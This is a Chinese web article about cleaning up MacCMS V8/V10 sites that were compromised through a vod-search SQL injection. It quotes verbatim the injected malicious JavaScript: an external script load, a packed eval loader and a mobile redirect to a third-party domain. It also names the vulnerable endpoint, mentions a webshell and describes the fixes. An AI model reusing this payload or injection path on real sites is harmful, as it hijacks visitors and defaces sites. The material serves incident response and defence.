花魁直播高品质美女在线视频互动社区 - 花魁直播官方版

 歡迎來到素材無憂網(wǎng),按 + 收藏我們
登錄 注冊 退出 找回密碼

最新蘋果cms漏洞被頻繁掛馬該如何解決

時間: 2020-09-16 11:17 閱讀: 作者:素材無憂網(wǎng)

2020年剛開始,蘋果CMS被爆出數(shù)據(jù)庫代碼執(zhí)行漏洞,大量的電影網(wǎng)站被掛馬,尤其電影的頁面被篡改植入了惡意代碼,數(shù)據(jù)庫中的VOD表里的d_name被全部修改,導(dǎo)致網(wǎng)站打開后直接跳轉(zhuǎn)到S站或者彈窗廣告,目前該maccms漏洞受影響的蘋果系統(tǒng)版本是V8,V10,很多客戶網(wǎng)站被反復(fù)篡改,很無奈,通過朋友介紹找到我們尋求技術(shù)上支持,防止網(wǎng)站被掛馬。根據(jù)客戶的反應(yīng),服務(wù)器采用的是linux centos系統(tǒng),蘋果CMS版本是最新的V10版本,我們立即成立網(wǎng)站安全應(yīng)急響應(yīng)處理,幫助客戶解決網(wǎng)站被攻擊的問題。

最新蘋果cms漏洞被頻繁掛馬該如何解決

首先很多站長以為升級了蘋果CMS官方最新的漏洞補丁就沒問題了,通過我們技術(shù)對補丁的代碼安全分析發(fā)現(xiàn),該漏洞補丁對當前的數(shù)據(jù)庫代碼執(zhí)行漏洞是沒有任何效果的,于事無補,網(wǎng)站還會繼續(xù)被攻擊。

我們來看下客戶網(wǎng)站目前發(fā)生的掛馬問題,打開網(wǎng)站首頁以及各個電影地址都會被插入掛馬代碼,如下圖所示:

打包壓縮了一份網(wǎng)站源代碼,以及nginx網(wǎng)站日志文件,我們工程師在根目錄下發(fā)現(xiàn)被上傳了網(wǎng)站webshell木馬文件,通過網(wǎng)站日志溯源追蹤我們查看到訪問這個PHP腳本木馬文件的是一個韓國的IP,具體的代碼如下圖:

最新蘋果cms漏洞被頻繁掛馬該如何解決

代碼做了加密處理,我們對其解密發(fā)現(xiàn)該代碼的功能可以對網(wǎng)站進行上傳,下載,修改代碼,操作數(shù)據(jù)庫等功能,屬于PHP大馬的范疇,也叫webshell木馬文件,我們又對蘋果CMS的源代碼進行了人工安全審計,發(fā)現(xiàn)index.php代碼對搜索模塊上做的一些惡意代碼過濾檢查存在漏洞,可導(dǎo)致攻擊者繞過安全過濾,直接將SQL插入代碼執(zhí)行到數(shù)據(jù)庫當中去。

我們對數(shù)據(jù)庫進行安全檢測發(fā)現(xiàn),在VOD表的d_name被批量植入了掛馬代碼:

<script src=https://www.11px.cn/1.js>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<61="3/2" 7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{}));var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout('window.location.href="https://m.qiche-hangjia.com:168/ua80666/"',500)}

這手法很專業(yè),不是一般的攻擊者所為,針對手機端做了跳轉(zhuǎn)以及隱藏嵌入,讓網(wǎng)站運營者根本無法察覺發(fā)現(xiàn),還判斷了cookies來路,達到條件才能觸發(fā)攻擊者植入的廣告代碼。繼續(xù)安全分析與追蹤,發(fā)現(xiàn)了攻擊者的手法,POST提交到/index.php?m=vod-search,POST內(nèi)容是加密的這里就不方便發(fā)出了,屬于漏洞攻擊了,可能會給其他使用蘋果CMS系統(tǒng)的網(wǎng)站造成攻擊,我們技術(shù)對POST攻擊代碼進行了解密分析,發(fā)現(xiàn)確實是繞過了蘋果官方V8,V10系統(tǒng)的代碼安全過濾,直接將掛馬代碼插入到了數(shù)據(jù)庫里了。

問題根源找到了,接下來我們對客戶的蘋果CMS漏洞進行修復(fù),對POST提交過來的參數(shù)進行嚴格的過濾與轉(zhuǎn)義,對vod-search含有的惡意字符進行強制轉(zhuǎn)換,對惡意代碼進行安全攔截,防止傳入到后端進行數(shù)據(jù)庫里的代碼執(zhí)行。對網(wǎng)站代碼里存在的木馬后門進行了全面的人工審計與檢查,共計發(fā)現(xiàn)5個后門,其余的在緩存目錄當中,跟程序代碼混淆在一起,也都刪除了,對網(wǎng)站的后臺地址進行了更改,之前后臺使用的地址被攻擊者掌握,對管理員的賬號密碼進行了加強,至此蘋果CMS網(wǎng)站被掛馬的問題才得以徹底解決,如果您的maccms也被一直掛馬,自己懂代碼的話可以對POST到index.php的數(shù)據(jù)進行安全攔截與檢查,防止惡意代碼的插入,如果不是太懂的話,建議找專業(yè)的網(wǎng)站安全公司來處理解決。

版權(quán)聲明: 本站資源均來自互聯(lián)網(wǎng)或會員發(fā)布,如果侵犯了您的權(quán)益請與我們聯(lián)系,我們將在24小時內(nèi)刪除!謝謝!

轉(zhuǎn)載請注明: 最新蘋果cms漏洞被頻繁掛馬該如何解決

標簽:  
相關(guān)文章
推薦文章
模板推薦